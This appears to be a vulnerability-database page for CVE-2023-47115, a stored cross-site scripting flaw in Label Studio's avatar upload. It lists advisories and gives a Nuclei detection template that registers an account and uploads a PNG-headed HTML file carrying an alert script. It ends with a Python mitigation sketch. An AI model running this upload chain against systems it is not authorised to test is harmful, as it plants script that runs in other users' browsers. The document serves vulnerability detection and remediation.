| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-47115 | 23 Jan 2024 22:24 | – | circl |
| Label Studio Cross-Site Scripting Vulnerability | 23 Jan 2024 00:00 | – | cnnvd |
| CVE-2023-47115 | 23 Jan 2024 22:49 | – | cve |
| CVE-2023-47115 Label Studio XSS Vulnerability on Avatar Upload | 23 Jan 2024 22:49 | – | cvelist |
| EUVD-2024-0082 | 3 Oct 2025 20:07 | – | euvd |
| Cross-site Scripting Vulnerability on Avatar Upload | 24 Jan 2024 14:21 | – | github |
| CVE-2023-47115 | 23 Jan 2024 23:15 | – | nvd |
| CVE-2023-47115 Label Studio XSS Vulnerability on Avatar Upload | 23 Jan 2024 22:49 | – | osv |
| GHSA-Q68H-XWQ5-MM7X Cross-site Scripting Vulnerability on Avatar Upload | 24 Jan 2024 14:21 | – | osv |
| PYSEC-2024-126 | 23 Jan 2024 23:15 | – | osv |

```yaml
id: CVE-2023-47115

info:
  name: Label Studio - Cross-Site Scripting
  author: isacaya
  severity: high
  description: |
    Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
  impact: |
    Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
  remediation: |
    Update to version 1.9.2.
  reference:
    - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
    - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2023-47115
    cwe-id: CWE-79
    epss-score: 0.01448
    epss-percentile: 0.70116
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    shodan-query: http.favicon.hash:-1649949475
    product: label_studio
    vendor: humansignal
  tags: cve,cve2023,xss,authenticated,intrusive,label-studio,vuln

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/signup/?&next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false

      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /api/users/{{id}}/avatar/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF

        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
        Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
        Content-Type: image/png

        {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF

      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}

      - |
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: xpath
        name: csrftoken
        internal: true
        attribute: value
        xpath:
          - '/html/body/div/form/input'

      - type: json
        part: body
        name: id
        internal: true
        json:
          - '.id'

      - type: json
        part: body
        name: filename
        internal: true
        json:
          - '.avatar'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'text/html')"
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a00473045022100cb18dfa741f9efa5a69833c685a5696f062f4722b032f2ef796333a80b6680e30220474b7513d5121d1e536ea3c1ee01a17be54db80e4990c1c2ebbd164fbb4be589:922c64590222798bb761d5b6d8e72950
```
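
The template's final matcher fires because a file uploaded as `nuclei.html` with a PNG header comes back as `text/html`. The sketch below is an added example of one upload-side mitigation, not Label Studio's code or its actual fix: it parses the PNG completely and stores it under a server-chosen name. The function names, the PNG-only policy and the use of `mimetypes` as a stand-in for the file server's content-type lookup are assumptions.

```python
import mimetypes
import struct
import uuid
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_is_well_formed(data: bytes) -> bool:
    """Walk every chunk: lengths fit, CRCs match, IHDR first, IEND last."""
    if not data.startswith(PNG_SIG):
        return False
    pos, first = len(PNG_SIG), True
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype, end = data[pos + 4:pos + 8], pos + 12 + length
        if end > len(data):
            return False  # chunk claims more bytes than the file holds
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(data[pos + 4:end - 4]) != crc:
            return False  # CRC covers chunk type + chunk body
        if first and ctype != b"IHDR":
            return False
        first, pos = False, end
        if ctype == b"IEND":
            return pos == len(data)  # nothing may trail the image
    return False  # ran out of data before IEND

def stored_avatar_name(client_name: str, data: bytes) -> str:
    """Server-chosen name; the client's name and extension are never reused."""
    if not png_is_well_formed(data):
        raise ValueError(f"rejected {client_name!r}: not a well-formed PNG")
    return f"{uuid.uuid4().hex}.png"

def served_type(name: str) -> str:
    """Extension-based lookup, standing in for how a file server picks Content-Type."""
    return mimetypes.guess_type(name)[0] or "application/octet-stream"

def make_chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

# Constructed samples: a minimal 1x1 PNG, and a PNG header followed by markup.
IHDR = make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
GOOD_PNG = PNG_SIG + IHDR + make_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + make_chunk(b"IEND", b"")
TRUNCATED = PNG_SIG + IHDR + b"\x00\x00\x00\x46IDAT<p>markup, not pixel data</p>"

if __name__ == "__main__":
    print(served_type("nuclei.html"), "->", served_type(stored_avatar_name("nuclei.html", GOOD_PNG)))
```

A check that only looks at the signature or the IHDR chunk accepts `TRUNCATED`; the full chunk walk rejects it, and the renamed file can no longer be served as HTML even if validation is bypassed.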